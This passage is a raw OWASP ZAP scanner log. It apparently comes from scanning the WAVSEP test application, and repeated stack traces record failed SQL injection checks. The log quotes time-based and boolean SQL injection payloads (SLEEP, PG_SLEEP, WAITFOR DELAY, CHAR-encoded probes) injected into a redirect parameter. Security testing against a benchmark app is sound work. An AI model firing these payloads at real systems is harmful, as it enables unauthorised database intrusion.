java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682092 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7038=7038) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7038=7038) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682093 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))GQwB)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))GQwB)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682094 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))NpqI)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))NpqI)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682095 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))uShh)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))uShh)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682096 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))eiDM)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))eiDM)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682096 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))LtJB)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))LtJB)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682097 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))AnoM)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))AnoM)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682098 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682099 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682100 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682101 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682101 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682102 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682103 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 